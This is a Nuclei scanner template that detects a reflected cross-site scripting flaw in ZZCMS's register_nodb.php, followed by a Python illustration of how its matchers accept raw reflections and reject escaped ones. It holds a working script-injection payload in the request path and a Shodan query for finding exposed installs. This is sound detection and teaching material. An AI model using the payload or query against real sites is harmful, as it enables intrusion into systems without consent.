Vulnerability Description
A reflected Cross-Site Scripting (XSS) vulnerability was identified in register_nodb.php of ZZCMS; it allows injection of malicious scripts via user-supplied input.
id: zzcms-register-xss

info:
  name: Zzcms `register_nodb.php` - Cross Site Scripting
  author: 3th1c_yuk1
  severity: medium
  description: |
    Identified a reflected Cross-Site Scripting (XSS) vulnerability in register_nodb.php of ZZCMS, which allowed injection of malicious scripts via user-supplied input.
  reference:
    - https://github.com/Sinon2003/cve/blob/main/zzcms/xss-register_nodb.php.md
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"zzcms"
  tags: xss,zzcms,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/3/ucenter_api/code/register_nodb.php/"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'
          - 'example=register'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022036b2e2422c647cd1c629c6d38418d4a9a451299467da4d484d8729aa854b2282022100dd05e77f86a82d78bb36505e08ac1f751932a8072da2c0734bfb4055c1bc6c9b:922c64590222798bb761d5b6d8e72950
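The template's three matchers, evaluated against constructed responses to show which cases they accept and which they reject, including the HTML-escaped reflection a fixed page would return. This is an added example, not part of the original template or of ZZCMS; the form markup in `render_page` and all sample responses are assumptions made for illustration.

```python
import html

# Matcher values copied from the template above.
BODY_WORDS = ['"><script>alert(document.domain)</script>', 'example=register']
CONTENT_TYPE_WORD = "text/html"
EXPECTED_STATUS = 200

# The path suffix the template appends after register_nodb.php.
PROBE = '"><script>alert(document.domain)</script>'


def template_matches(status, content_type, body):
    """Evaluate the three matchers under matchers-condition: and."""
    body_ok = all(word in body for word in BODY_WORDS)  # word matcher, condition: and
    type_ok = CONTENT_TYPE_WORD in content_type         # part: content_type
    return body_ok and type_ok and status == EXPECTED_STATUS


def render_page(reflected):
    """Constructed page (assumed markup): a form action that reflects the request path."""
    return ('<html><body><form method="post" '
            f'action="/3/ucenter_api/code/register_nodb.php/{reflected}?example=register">'
            '</form></body></html>')


def sample_responses():
    """Constructed (status, content_type, body) tuples, not captured traffic."""
    raw = render_page(PROBE)
    escaped = render_page(html.escape(PROBE, quote=True))  # output-encoded reflection
    return {
        "raw reflection": (200, "text/html; charset=utf-8", raw),
        "escaped reflection": (200, "text/html; charset=utf-8", escaped),
        "raw but JSON type": (200, "application/json", raw),
        "raw on error page": (404, "text/html", raw),
    }


def evaluate_all():
    """Return {case name: True if every matcher is satisfied}."""
    return {name: template_matches(*resp) for name, resp in sample_responses().items()}


if __name__ == "__main__":
    for name, hit in evaluate_all().items():
        print(f"{name:20} -> {'match' if hit else 'no match'}")
```

Only the first case satisfies all three matchers; the content-type and status matchers exist to discard reflections that a browser would not render as an HTML page.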